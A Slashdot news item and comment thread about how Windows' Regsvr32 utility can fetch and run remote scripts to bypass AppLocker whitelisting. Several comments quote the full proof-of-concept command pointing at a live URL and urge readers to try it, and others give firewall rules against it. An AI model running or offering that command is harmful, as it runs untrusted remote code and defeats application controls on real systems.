Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
Security Microsoft Windows

Core Windows Utility Can Be Used To Bypass Whitelisting (threatpost.com) 118

Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.
This discussion has been archived. No new comments can be posted.

Core Windows Utility Can Be Used To Bypass Whitelisting

Comments Filter:
  • by Frosty Piss ( 770223 ) * on Friday April 22, 2016 @11:30AM (#51964721)

    A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.

    • by Anonymous Coward

      They ignored it, so it became less private.

      • by Anonymous Coward

        No. They didn't issue a patch within 2 hours, so he went public.

  • easy.

  • Don't all browsers have url javascript shut off by default?

  • You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.

    • by Anonymous Coward on Friday April 22, 2016 @11:50AM (#51964879)

      The real issue is that regsvr32 understands URL's:

      regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

      Running this tells Windows to fetch an XML file from the internet, which tells it to run cmd.exe. The magic here is that if you change cmd.exe for any program outside the AppLocker whitelist, bingo: it will start, in theory. regsvr32 is part of the operating system and can be used to register and unregister COM script files with the Windows Registry. /s tells regsvr32 to be silent, /n tells it not to use DllRegisterServer, /i passes an optional parameter (our URL) to DLLinstall, /u means we're trying to unregister an object, and scrobj.dll is Microsoft's Script Component Runtime.

    • by Charles Werbick ( 4135297 ) on Friday April 22, 2016 @12:06PM (#51964991)

      This exploit does not need admin rights. I just tried it. the request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

      The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

      (Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

      Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

      regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

      • So basically it can seed and execute Ransomware from an HTTPS session?? Oh, NICE! NOT!!! Being that form of malware runs purely in RAM and doesn't leave a trace of code on the disk other than encrypting local and mapped data.

      • Just tried it and my firewall http://www.binisoft.org/wfc.ph... [binisoft.org] (default: deny all outgoing/incoming) gave me a nice popup asking if I want to allow it.

  • by U2xhc2hkb3QgU3Vja3M ( 4212163 ) on Friday April 22, 2016 @11:57AM (#51964925)

    The Disable Advertising checkbox does not work.

  • I would think this can bypass Bit9 as well, since regsvr32 is a common windows component and allowed. Anyone got a different opinion?
  • by Mr.Intel ( 165870 ) <(moc.oohay) (ta) (371letnirm)> on Friday April 22, 2016 @12:02PM (#51964949) Homepage Journal
    It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
    • by davor_p ( 98394 )

      Do not forget Wow64 version of the executable in %SystemRoot%\SysWOW64 directory on 64-bit systems:

      New-NetFirewallRule -DisplayName "Block Regsvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
      New-NetFirewallRule -DisplayName "Block Regsvr32 Wow64" -Program "%SystemRoot%\SysWOW64\regsvr32.exe" -Direction Outbound -Action Block

      (do try to run this from PowerShell with admin rights as well)

  • I'd laugh (Score:2, Insightful)

    I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.

    Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?

    • by Megol ( 3135005 )

      Standard operating systems have a lot of surface to exploit. The real question is if there will ever be a secure operating system, I'm not sure given the expectations of users. Still could be a _lot_ better...

  • So basically the guy hat wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
    https://technet.microsoft.com/... [microsoft.com]

    AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocke

    • Looks like you didn't read TFA.

      The exploit is that regsvr32 can download a script from the Internet and execute it. If that script launches an executable that AppLocker should block, teh executable will launch anyway.

      In short, not only is a single command all that's necessary to download a malware kit from the Internet and run it, the kit can be a simple (and locally untraceable) way to get around AppLocker restrictions.

      • by clovis ( 4684 )

        I did read the article, and understand the attack.
        The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

        If users can run cmd prompts and regsvr32, then you're hosed anyway.
        If you want to prevent misuse of regsvr32, cmd prompts and tools like that, you use Group Policy.

        • The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

          Basically, what you are saying is that Applocker is designed to be ineffective.

          • by clovis ( 4684 )

            The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

            Basically, what you are saying is that Applocker is designed to be ineffective.

            Lol, good one, but no.

            AppLocker does what it is supposed to do, and it does not do what it says it can't do. But you would not know that unless you read the documentation.
            AppLocker documentation specifically says it does not protect against something like regsv32r's newly discovered behavior.

            AppLockers purpose is to simplify software restriction policies and it's useful for that.
            If you have to create the images for 1,000 workstations, and only 500 of them have licensing for Microsoft office, 150 have licens

            • Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

              The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

              I never claimed that it was an anti-malware tool.

              • by clovis ( 4684 )

                Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

                The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

                I never claimed that it was an anti-malware tool.

                From the documentation:

                AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.

                Again:

                You must thoroughly examine each application before allowing them to run by using AppLocker rules.

                Do users need to be running regsvr32? No, they do not. You block it using AppLocker just like you block regedit.exe and sol.exe

                Also, if you go to the trouble is implementing something AppLocker, you don't let users open cmd prompts or run bat files. No ordinary user should be able to type in anything like "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll" and run it if you have control of the corporate systems.

                Full disclosure: we don't use AppLocker where I work, but we us

  • by nuckfuts ( 690967 ) on Friday April 22, 2016 @12:16PM (#51965079)
    I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.
    • by guruevi ( 827432 )

      According to the summary, the researcher did disclose this to Microsoft and they probably didn't respond. This is really a one-day patch kind of thing. Responsible disclosure is only invented by the corporations like Microsoft so they don't have to react quickly to a bug and it's reasonable to expect that the NSA is involved as well so they have a window to exploit the bug.

      After the push to responsible disclosure by Microsoft, their products suddenly got "safer". I say disclose, God knows how many bugs Micr

    • I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

      It's a post-compromise application whitelisting bypass, of which there are other techniques. I don't think this is quite what you think it is.

  • Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?
  • Can't you just rename the damn file to something else?

  • ...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.
  • The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:

    - Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
    - The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you

To write good code is a worthy challenge, and a source of civilized delight. -- stolen and paraphrased from William Safire

Working...